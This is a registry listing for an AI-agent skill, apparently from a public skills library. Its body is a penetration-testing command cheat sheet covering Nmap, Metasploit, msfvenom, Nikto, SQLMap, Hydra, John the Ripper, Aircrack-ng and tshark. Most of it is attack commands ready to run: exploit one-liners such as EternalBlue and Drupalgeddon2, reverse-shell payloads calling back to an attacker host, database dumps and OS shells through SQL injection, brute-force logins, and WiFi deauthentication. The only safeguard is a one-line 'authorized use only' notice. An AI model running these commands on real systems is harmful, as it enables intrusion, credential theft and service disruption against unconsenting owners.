{"id":"6d44b08d-af01-4ee3-8de1-9e5407645920","shortId":"N6BRgd","kind":"skill","title":"pentest-commands","tagline":"Provide a comprehensive command reference for penetration testing tools including network scanning, exploitation, password cracking, and web application testing. Enable quick command lookup during security assessments.","description":"> AUTHORIZED USE ONLY: Use this skill only for authorized security assessments, defensive validation, or controlled educational environments.\n\n# Pentest Commands\n\n## Purpose\n\nProvide a comprehensive command reference for penetration testing tools including network scanning, exploitation, password cracking, and web application testing. Enable quick command lookup during security assessments.\n\n## Inputs/Prerequisites\n\n- Kali Linux or penetration testing distribution\n- Target IP addresses with authorization\n- Wordlists for brute forcing\n- Network access to target systems\n- Basic understanding of tool syntax\n\n## Outputs/Deliverables\n\n- Network enumeration results\n- Identified vulnerabilities\n- Exploitation payloads\n- Cracked credentials\n- Web vulnerability findings\n\n## Core Workflow\n\n### 1. Nmap Commands\n\n**Host Discovery:**\n\n```bash\n# Ping sweep\nnmap -sP 192.168.1.0/24\n\n# List IPs without scanning\nnmap -sL 192.168.1.0/24\n\n# Ping scan (host discovery)\nnmap -sn 192.168.1.0/24\n```\n\n**Port Scanning:**\n\n```bash\n# TCP SYN scan (stealth)\nnmap -sS 192.168.1.1\n\n# Full TCP connect scan\nnmap -sT 192.168.1.1\n\n# UDP scan\nnmap -sU 192.168.1.1\n\n# All ports (1-65535)\nnmap -p- 192.168.1.1\n\n# Specific ports\nnmap -p 22,80,443 192.168.1.1\n```\n\n**Service Detection:**\n\n```bash\n# Service versions\nnmap -sV 192.168.1.1\n\n# OS detection\nnmap -O 192.168.1.1\n\n# Comprehensive scan\nnmap -A 192.168.1.1\n\n# Skip host discovery\nnmap -Pn 192.168.1.1\n```\n\n**NSE Scripts:**\n\n```bash\n# Vulnerability scan\nnmap --script vuln 192.168.1.1\n\n# SMB enumeration\nnmap --script smb-enum-shares -p 445 192.168.1.1\n\n# HTTP enumeration\nnmap --script http-enum -p 80 192.168.1.1\n\n# Check EternalBlue\nnmap --script smb-vuln-ms17-010 192.168.1.1\n\n# Check MS08-067\nnmap --script smb-vuln-ms08-067 192.168.1.1\n\n# SSH brute force\nnmap --script ssh-brute -p 22 192.168.1.1\n\n# FTP anonymous\nnmap --script ftp-anon 192.168.1.1\n\n# DNS brute force\nnmap --script dns-brute 192.168.1.1\n\n# HTTP methods\nnmap -p80 --script http-methods 192.168.1.1\n\n# HTTP headers\nnmap -p80 --script http-headers 192.168.1.1\n\n# SQL injection check\nnmap --script http-sql-injection -p 80 192.168.1.1\n```\n\n**Advanced Scans:**\n\n```bash\n# Xmas scan\nnmap -sX 192.168.1.1\n\n# ACK scan (firewall detection)\nnmap -sA 192.168.1.1\n\n# Window scan\nnmap -sW 192.168.1.1\n\n# Traceroute\nnmap --traceroute 192.168.1.1\n```\n\n### 2. Metasploit Commands\n\n**Basic Usage:**\n\n```bash\n# Launch Metasploit\nmsfconsole\n\n# Search for exploits\nsearch type:exploit name:smb\n\n# Use exploit\nuse exploit/windows/smb/ms17_010_eternalblue\n\n# Show options\nshow options\n\n# Set target\nset RHOST 192.168.1.1\n\n# Set payload\nset PAYLOAD windows/meterpreter/reverse_tcp\n\n# Run exploit\nexploit\n```\n\n**Common Exploits:**\n\n```bash\n# EternalBlue\nmsfconsole -x \"use exploit/windows/smb/ms17_010_eternalblue; set RHOST 192.168.1.1; exploit\"\n\n# MS08-067 (Conficker)\nmsfconsole -x \"use exploit/windows/smb/ms08_067_netapi; set RHOST 192.168.1.1; exploit\"\n\n# vsftpd backdoor\nmsfconsole -x \"use exploit/unix/ftp/vsftpd_234_backdoor; set RHOST 192.168.1.1; exploit\"\n\n# Shellshock\nmsfconsole -x \"use exploit/linux/http/apache_mod_cgi_bash_env_exec; set RHOST 192.168.1.1; exploit\"\n\n# Drupalgeddon2\nmsfconsole -x \"use exploit/unix/webapp/drupal_drupalgeddon2; set RHOST 192.168.1.1; exploit\"\n\n# PSExec\nmsfconsole -x \"use exploit/windows/smb/psexec; set RHOST 192.168.1.1; set SMBUser user; set SMBPass pass; exploit\"\n```\n\n**Scanners:**\n\n```bash\n# TCP port scan\nmsfconsole -x \"use auxiliary/scanner/portscan/tcp; set RHOSTS 192.168.1.0/24; run\"\n\n# SMB version scan\nmsfconsole -x \"use auxiliary/scanner/smb/smb_version; set RHOSTS 192.168.1.0/24; run\"\n\n# SMB share enumeration\nmsfconsole -x \"use auxiliary/scanner/smb/smb_enumshares; set RHOSTS 192.168.1.0/24; run\"\n\n# SSH brute force\nmsfconsole -x \"use auxiliary/scanner/ssh/ssh_login; set RHOSTS 192.168.1.0/24; set USER_FILE users.txt; set PASS_FILE passwords.txt; run\"\n\n# FTP brute force\nmsfconsole -x \"use auxiliary/scanner/ftp/ftp_login; set RHOSTS 192.168.1.0/24; set USER_FILE users.txt; set PASS_FILE passwords.txt; run\"\n\n# RDP scanning\nmsfconsole -x \"use auxiliary/scanner/rdp/rdp_scanner; set RHOSTS 192.168.1.0/24; run\"\n```\n\n**Handler Setup:**\n\n```bash\n# Multi-handler for reverse shells\nmsfconsole -x \"use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.1.2; set LPORT 4444; exploit\"\n```\n\n**Payload Generation (msfvenom):**\n\n```bash\n# Windows reverse shell\nmsfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f exe > shell.exe\n\n# Linux reverse shell\nmsfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f elf > shell.elf\n\n# PHP reverse shell\nmsfvenom -p php/reverse_php LHOST=192.168.1.2 LPORT=4444 -f raw > shell.php\n\n# ASP reverse shell\nmsfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f asp > shell.asp\n\n# WAR file\nmsfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f war > shell.war\n\n# Python payload\nmsfvenom -p cmd/unix/reverse_python LHOST=192.168.1.2 LPORT=4444 -f raw > shell.py\n```\n\n### 3. Nikto Commands\n\n```bash\n# Basic scan\nnikto -h http://192.168.1.1\n\n# Comprehensive scan\nnikto -h http://192.168.1.1 -C all\n\n# Output to file\nnikto -h http://192.168.1.1 -output report.html\n\n# Plugin-based scans\nnikto -h http://192.168.1.1 -Plugins robots\nnikto -h http://192.168.1.1 -Plugins shellshock\nnikto -h http://192.168.1.1 -Plugins heartbleed\nnikto -h http://192.168.1.1 -Plugins ssl\n\n# Export to Metasploit\nnikto -h http://192.168.1.1 -Format msf+\n\n# Specific tuning\nnikto -h http://192.168.1.1 -Tuning 1  # Interesting files only\n```\n\n### 4. SQLMap Commands\n\n```bash\n# Basic injection test\nsqlmap -u \"http://192.168.1.1/page?id=1\"\n\n# Enumerate databases\nsqlmap -u \"http://192.168.1.1/page?id=1\" --dbs\n\n# Enumerate tables\nsqlmap -u \"http://192.168.1.1/page?id=1\" -D database --tables\n\n# Dump table\nsqlmap -u \"http://192.168.1.1/page?id=1\" -D database -T users --dump\n\n# OS shell\nsqlmap -u \"http://192.168.1.1/page?id=1\" --os-shell\n\n# POST request\nsqlmap -u \"http://192.168.1.1/login\" --data=\"user=admin&pass=test\"\n\n# Cookie injection\nsqlmap -u \"http://192.168.1.1/page\" --cookie=\"id=1*\"\n\n# Bypass WAF\nsqlmap -u \"http://192.168.1.1/page?id=1\" --tamper=space2comment\n\n# Risk and level\nsqlmap -u \"http://192.168.1.1/page?id=1\" --risk=3 --level=5\n```\n\n### 5. Hydra Commands\n\n```bash\n# SSH brute force\nhydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.1\n\n# FTP brute force\nhydra -l admin -P /usr/share/wordlists/rockyou.txt ftp://192.168.1.1\n\n# HTTP POST form\nhydra -l admin -P passwords.txt 192.168.1.1 http-post-form \"/login:user=^USER^&pass=^PASS^:Invalid\"\n\n# HTTP Basic Auth\nhydra -l admin -P passwords.txt 192.168.1.1 http-get /admin/\n\n# SMB brute force\nhydra -l admin -P passwords.txt smb://192.168.1.1\n\n# RDP brute force\nhydra -l admin -P passwords.txt rdp://192.168.1.1\n\n# MySQL brute force\nhydra -l root -P passwords.txt mysql://192.168.1.1\n\n# Username list\nhydra -L users.txt -P passwords.txt ssh://192.168.1.1\n```\n\n### 6. John the Ripper Commands\n\n```bash\n# Crack password file\njohn hash.txt\n\n# Specify wordlist\njohn hash.txt --wordlist=/usr/share/wordlists/rockyou.txt\n\n# Show cracked passwords\njohn hash.txt --show\n\n# Specify format\njohn hash.txt --format=raw-md5\njohn hash.txt --format=nt\njohn hash.txt --format=sha512crypt\n\n# SSH key passphrase\nssh2john id_rsa > ssh_hash.txt\njohn ssh_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt\n\n# ZIP password\nzip2john file.zip > zip_hash.txt\njohn zip_hash.txt\n```\n\n### 7. Aircrack-ng Commands\n\n```bash\n# Monitor mode\nairmon-ng start wlan0\n\n# Capture packets\nairodump-ng wlan0mon\n\n# Target specific network\nairodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon\n\n# Deauth attack\naireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF wlan0mon\n\n# Crack WPA handshake\naircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap\n```\n\n### 8. Wireshark/Tshark Commands\n\n```bash\n# Capture traffic\ntshark -i eth0 -w capture.pcap\n\n# Read capture file\ntshark -r capture.pcap\n\n# Filter by protocol\ntshark -r capture.pcap -Y \"http\"\n\n# Filter by IP\ntshark -r capture.pcap -Y \"ip.addr == 192.168.1.1\"\n\n# Extract HTTP data\ntshark -r capture.pcap -Y \"http\" -T fields -e http.request.uri\n```\n\n## Quick Reference\n\n### Common Port Scans\n\n```bash\n# Quick scan\nnmap -F 192.168.1.1\n\n# Full comprehensive\nnmap -sV -sC -A -p- 192.168.1.1\n\n# Fast with version\nnmap -sV -T4 192.168.1.1\n```\n\n### Password Hash Types\n\n| Mode | Type |\n|------|------|\n| 0 | MD5 |\n| 100 | SHA1 |\n| 1000 | NTLM |\n| 1800 | sha512crypt |\n| 3200 | bcrypt |\n| 13100 | Kerberoast |\n\n## Constraints\n\n- Always have written authorization\n- Some scans are noisy and detectable\n- Brute forcing may lock accounts\n- Rate limiting affects tools\n\n## Examples\n\n### Example 1: Quick Vulnerability Scan\n\n```bash\nnmap -sV --script vuln 192.168.1.1\n```\n\n### Example 2: Web App Test\n\n```bash\nnikto -h http://target && sqlmap -u \"http://target/page?id=1\" --dbs\n```\n\n## Troubleshooting\n\n| Issue | Solution |\n|-------|----------|\n| Scan too slow | Increase timing (-T4, -T5) |\n| Ports filtered | Try different scan types |\n| Exploit fails | Check target version compatibility |\n| Passwords not cracking | Try larger wordlists, rules |\n\n## When to Use\nThis skill is applicable to execute the workflow or actions described in the overview.","tags":["pentest","commands","antigravity","awesome","skills","sickn33","agent-skills","agentic-skills","ai-agent-skills","ai-agents","ai-coding","ai-workflows"],"capabilities":["skill","source-sickn33","skill-pentest-commands","topic-agent-skills","topic-agentic-skills","topic-ai-agent-skills","topic-ai-agents","topic-ai-coding","topic-ai-workflows","topic-antigravity","topic-antigravity-skills","topic-claude-code","topic-claude-code-skills","topic-codex-cli","topic-codex-skills"],"categories":["antigravity-awesome-skills"],"synonyms":[],"warnings":[],"endpointUrl":"https://skills.sh/sickn33/antigravity-awesome-skills/pentest-commands","protocol":"skill","transport":"skills-sh","auth":{"type":"none","details":{"cli":"npx skills add sickn33/antigravity-awesome-skills","source_repo":"https://github.com/sickn33/antigravity-awesome-skills","install_from":"skills.sh"}},"qualityScore":"0.700","qualityRationale":"deterministic score 0.70 from registry signals: · indexed on github topic:agent-skills · 34616 github stars · SKILL.md body (9,297 chars)","verified":false,"liveness":"unknown","lastLivenessCheck":null,"agentReviews":{"count":0,"score_avg":null,"cost_usd_avg":null,"success_rate":null,"latency_p50_ms":null,"narrative_summary":null,"summary_updated_at":null},"enrichmentModel":"deterministic:skill-github:v1","enrichmentVersion":1,"enrichedAt":"2026-04-23T00:51:22.986Z","embedding":null,"createdAt":"2026-04-18T21:42:16.794Z","updatedAt":"2026-04-23T00:51:22.986Z","lastSeenAt":"2026-04-23T00:51:22.986Z","tsv":"'-0':989 '-067':248,390 '-65535':170 '/24':128,136,144,455,467,479,491,511,530 '/admin':854 '/login':763,836 '/page':711,719,728,739,752,774,783,794 '/usr/share/wordlists/rockyou.txt':812,821,906,939,1006 '0':1085 '010':244 '067':255 '1':117,169,697,713,721,730,741,754,777,785,796,1119,1142 '10':990 '100':1087 '1000':1089 '13100':1095 '1800':1091 '192.168.1.0':127,135,143,454,466,478,490,510,529 '192.168.1.1':154,161,166,173,181,189,194,199,205,214,225,235,245,256,267,275,284,293,302,314,322,329,334,338,368,387,398,408,417,426,435,643,648,656,665,670,675,680,688,695,710,718,727,738,751,762,773,782,793,813,822,831,850,863,872,881,889,1041,1064,1072,1079,1128 '192.168.1.2':550,566,579,592,605,617,629 '2':339,1130 '22':178,266 '3':635,798 '3200':1093 '4':701 '443':180 '4444':553,568,581,594,607,619,631 '445':224 '5':800,801 '6':890,973 '7':947 '8':1008 '80':179,234,313 'aa':975,992 'access':93 'account':1112 'ack':323 'action':1185 'address':85 'admin':766,810,819,828,847,860,869 'advanc':315 'affect':1115 'aircrack':949,1003 'aircrack-ng':948,1002 'aireplay':987 'aireplay-ng':986 'airmon':956 'airmon-ng':955 'airodump':963,970 'airodump-ng':962,969 'alway':1098 'anon':274 'anonym':269 'app':1132 'applic':21,67,1179 'asp':598,609 'assess':29,40,75 'attack':985 'auth':844 'author':30,38,87,1101 'auxiliary/scanner/ftp/ftp_login':507 'auxiliary/scanner/portscan/tcp':451 'auxiliary/scanner/rdp/rdp_scanner':526 'auxiliary/scanner/smb/smb_enumshares':475 'auxiliary/scanner/smb/smb_version':463 'auxiliary/scanner/ssh/ssh_login':487 'backdoor':401 'base':661 'bash':122,147,184,208,317,344,379,444,534,558,638,704,804,895,952,1011,1059,1123,1134 'basic':97,342,639,705,843 'bb':976,993 'bcrypt':1094 'brute':90,258,264,277,283,482,502,806,815,856,865,874,1108 'bssid':974 'bypass':778 'c':649,972 'captur':960,982,1012,1020 'capture-01.cap':1007 'capture.pcap':1018,1024,1030,1038,1047 'cc':977,994 'check':236,246,305,1162 'cmd/unix/reverse_python':627 'command':3,7,25,48,53,71,119,341,637,703,803,894,951,1010 'common':377,1056 'compat':1165 'comprehens':6,52,195,644,1066 'confick':391 'connect':157 'constraint':1097 'control':44 'cooki':769,775 'core':115 'crack':18,64,110,896,908,999,1168 'credenti':111 'd':731,742 'data':764,1044 'databas':715,732,743 'dbs':722,1143 'dd':978,995 'deauth':984 'defens':41 'describ':1186 'detect':183,191,326,1107 'differ':1157 'discoveri':121,140,202 'distribut':82 'dns':276,282 'dns-brute':281 'drupalgeddon2':419 'dump':734,746 'e':1052 'educ':45 'ee':979,996 'elf':583 'enabl':23,69 'enum':221,232 'enumer':104,216,227,471,714,723 'environ':46 'eternalblu':237,380 'eth0':1016 'exampl':1117,1118,1129 'exe':570 'execut':1181 'exploit':16,62,108,350,353,357,375,376,378,388,399,409,418,427,442,554,1160 'exploit/linux/http/apache_mod_cgi_bash_env_exec':414 'exploit/multi/handler':544 'exploit/unix/ftp/vsftpd_234_backdoor':405 'exploit/unix/webapp/drupal_drupalgeddon2':423 'exploit/windows/smb/ms08_067_netapi':395 'exploit/windows/smb/ms17_010_eternalblue':359,384 'exploit/windows/smb/psexec':432 'export':683 'extract':1042 'f':569,582,595,608,620,632,1063 'fail':1161 'fast':1073 'ff':980,997 'field':1051 'file':494,498,514,518,612,653,699,898,1021 'file.zip':943 'filter':1025,1033,1155 'find':114 'firewal':325 'forc':91,259,278,483,503,807,816,857,866,875,1109 'form':825,835 'format':689,914,917,923,927 'ftp':268,273,501,814 'ftp-anon':272 'full':155,1065 'generat':556 'get':853 'h':642,647,655,664,669,674,679,687,694,1136 'handler':532,537 'handshak':1001 'hash':1081 'hash.txt':900,904,911,916,922,926 'header':295,301 'heartble':677 'host':120,139,201 'http':226,231,285,291,294,300,309,823,833,842,852,1032,1043,1049 'http-enum':230 'http-get':851 'http-header':299 'http-method':290 'http-post-form':832 'http-sql-inject':308 'http.request.uri':1053 'hydra':802,808,817,826,845,858,867,876,884 'id':712,720,729,740,753,776,784,795,933,1141 'identifi':106 'includ':13,59 'increas':1150 'inject':304,311,706,770 'inputs/prerequisites':76 'interest':698 'invalid':841 'ip':84,130,1035 'ip.addr':1040 'issu':1145 'java/jsp_shell_reverse_tcp':615 'john':891,899,903,910,915,921,925,936,945 'kali':77 'kerberoast':1096 'key':930 'l':809,818,827,846,859,868,877,885 'larger':1170 'launch':345 'level':790,799 'lhost':549,565,578,591,604,616,628 'limit':1114 'linux':78,572 'linux/x64/shell_reverse_tcp':577 'list':129,883 'lock':1111 'lookup':26,72 'lport':552,567,580,593,606,618,630 'may':1110 'md5':920,1086 'metasploit':340,346,685 'method':286,292 'mode':954,1083 'monitor':953 'ms08':247,254,389 'ms17':243 'msf':690 'msfconsol':347,381,392,402,411,420,429,448,460,472,484,504,523,541 'msfvenom':557,562,575,588,601,613,625 'multi':536 'multi-handl':535 'mysql':873 'name':354 'network':14,60,92,103,968 'ng':950,957,964,971,988,1004 'nikto':636,641,646,654,663,668,673,678,686,693,1135 'nmap':118,125,133,141,152,159,164,171,176,187,192,197,203,211,217,228,238,249,260,270,279,287,296,306,320,327,332,336,1062,1067,1076,1124 'noisi':1105 'nse':206 'nt':924 'ntlm':1090 'o':193 'option':361,363 'os':190,747,756 'os-shel':755 'output':651,657 'outputs/deliverables':102 'overview':1189 'p':172,177,223,233,265,312,563,576,589,602,614,626,811,820,829,848,861,870,879,887,1071 'p80':288,297 'packet':961 'pass':441,497,517,767,839,840 'passphras':931 'password':17,63,897,909,941,1080,1166 'passwords.txt':499,519,830,849,862,871,880,888 'payload':109,370,372,546,555,624 'penetr':10,56,80 'pentest':2,47 'pentest-command':1 'php':585 'php/reverse_php':590 'ping':123,137 'plugin':660,666,671,676,681 'plugin-bas':659 'pn':204 'port':145,168,175,446,1057,1154 'post':758,824,834 'protocol':1027 'provid':4,50 'psexec':428 'purpos':49 'python':623 'quick':24,70,1054,1060,1120 'r':1023,1029,1037,1046 'rate':1113 'raw':596,633,919 'raw-md5':918 'rdp':521,864 'read':1019 'refer':8,54,1055 'report.html':658 'request':759 'result':105 'revers':539,560,573,586,599 'rhost':367,386,397,407,416,425,434,453,465,477,489,509,528 'ripper':893 'risk':788,797 'robot':667 'root':878 'rsa':934 'rule':1172 'run':374,456,468,480,500,520,531 'sa':328 'sc':1069 'scan':15,61,132,138,146,150,158,163,196,210,316,319,324,331,447,459,522,640,645,662,1058,1061,1103,1122,1147,1158 'scanner':443 'script':207,212,218,229,239,250,261,271,280,289,298,307,1126 'search':348,351 'secur':28,39,74 'servic':182,185 'set':364,366,369,371,385,396,406,415,424,433,436,439,452,464,476,488,492,496,508,512,516,527,545,548,551 'setup':533 'sha1':1088 'sha512crypt':928,1092 'share':222,470 'shell':540,561,574,587,600,748,757 'shell.asp':610 'shell.elf':584 'shell.exe':571 'shell.php':597 'shell.py':634 'shell.war':622 'shellshock':410,672 'show':360,362,907,912 'skill':35,1177 'skill-pentest-commands' 'skip':200 'sl':134 'slow':1149 'smb':215,220,241,252,355,457,469,855 'smb-enum-shar':219 'smb-vuln-ms08':251 'smb-vuln-ms17':240 'smbpass':440 'smbuser':437 'sn':142 'solut':1146 'source-sickn33' 'sp':126 'space2comment':787 'specif':174,691,967 'specifi':901,913 'sql':303,310 'sqlmap':702,708,716,725,736,749,760,771,780,791,1138 'ss':153 'ssh':257,263,481,805,929 'ssh-brute':262 'ssh2john':932 'ssh_hash.txt':935,937 'ssl':682 'st':160 'start':958 'stealth':151 'su':165 'sv':188,1068,1077,1125 'sw':333 'sweep':124 'sx':321 'syn':149 'syntax':101 'system':96 't4':1078,1152 't5':1153 'tabl':724,733,735 'tamper':786 'target':83,95,365,966,1137,1163 'target/page':1140 'tcp':148,156,445 'test':11,22,57,68,81,707,768,1133 'time':1151 'tool':12,58,100,1116 'topic-agent-skills' 'topic-agentic-skills' 'topic-ai-agent-skills' 'topic-ai-agents' 'topic-ai-coding' 'topic-ai-workflows' 'topic-antigravity' 'topic-antigravity-skills' 'topic-claude-code' 'topic-claude-code-skills' 'topic-codex-cli' 'topic-codex-skills' 'tracerout':335,337 'traffic':1013 'tri':1156,1169 'troubleshoot':1144 'tshark':1014,1022,1028,1036,1045 'tune':692,696 'type':352,1082,1084,1159 'u':709,717,726,737,750,761,772,781,792,1139 'udp':162 'understand':98 'usag':343 'use':31,33,356,358,383,394,404,413,422,431,450,462,474,486,506,525,543,1175 'user':438,493,513,745,765,837,838 'usernam':882 'users.txt':495,515,886 'valid':42 'version':186,458,1075,1164 'vsftpd':400 'vuln':213,242,253,1127 'vulner':107,113,209,1121 'w':981,1005,1017 'waf':779 'war':611,621 'web':20,66,112,1131 'window':330,559 'windows/meterpreter/reverse_tcp':373,547,564 'windows/shell_reverse_tcp':603 'wireshark/tshark':1009 'without':131 'wlan0':959 'wlan0mon':965,983,998 'wordlist':88,902,905,938,1171 'workflow':116,1183 'wpa':1000 'written':1100 'x':382,393,403,412,421,430,449,461,473,485,505,524,542 'xmas':318 'y':1031,1039,1048 'zip':940 'zip2john':942 'zip_hash.txt':944,946","prices":[{"id":"ee44f108-115b-4633-9310-ff9a72127a2d","listingId":"6d44b08d-af01-4ee3-8de1-9e5407645920","amountUsd":"0","unit":"free","nativeCurrency":null,"nativeAmount":null,"chain":null,"payTo":null,"paymentMethod":"skill-free","isPrimary":true,"details":{"org":"sickn33","category":"antigravity-awesome-skills","install_from":"skills.sh"},"createdAt":"2026-04-18T21:42:16.794Z"}],"sources":[{"listingId":"6d44b08d-af01-4ee3-8de1-9e5407645920","source":"github","sourceId":"sickn33/antigravity-awesome-skills/pentest-commands","sourceUrl":"https://github.com/sickn33/antigravity-awesome-skills/tree/main/skills/pentest-commands","isPrimary":false,"firstSeenAt":"2026-04-18T21:42:16.794Z","lastSeenAt":"2026-04-23T00:51:22.986Z"}],"details":{"listingId":"6d44b08d-af01-4ee3-8de1-9e5407645920","quickStartSnippet":null,"exampleRequest":null,"exampleResponse":null,"schema":null,"openapiUrl":null,"agentsTxtUrl":null,"citations":[],"useCases":[],"bestFor":[],"notFor":[],"kindDetails":{"org":"sickn33","slug":"pentest-commands","github":{"repo":"sickn33/antigravity-awesome-skills","stars":34616,"topics":["agent-skills","agentic-skills","ai-agent-skills","ai-agents","ai-coding","ai-workflows","antigravity","antigravity-skills","claude-code","claude-code-skills","codex-cli","codex-skills","cursor","cursor-skills","developer-tools","gemini-cli","gemini-skills","kiro","mcp","skill-library"],"license":"mit","html_url":"https://github.com/sickn33/antigravity-awesome-skills","pushed_at":"2026-04-22T06:40:00Z","description":"Installable GitHub library of 1,400+ agentic skills for Claude Code, Cursor, Codex CLI, Gemini CLI, Antigravity, and more. Includes installer CLI, bundles, workflows, and official/community skill collections.","skill_md_sha":"13c9545f3840cd21a40f143bd88aef094ef9ffa9","skill_md_path":"skills/pentest-commands/SKILL.md","default_branch":"main","skill_tree_url":"https://github.com/sickn33/antigravity-awesome-skills/tree/main/skills/pentest-commands"},"layout":"multi","source":"github","category":"antigravity-awesome-skills","frontmatter":{"name":"pentest-commands","description":"Provide a comprehensive command reference for penetration testing tools including network scanning, exploitation, password cracking, and web application testing. Enable quick command lookup during security assessments."},"skills_sh_url":"https://skills.sh/sickn33/antigravity-awesome-skills/pentest-commands"},"updatedAt":"2026-04-23T00:51:22.986Z"}}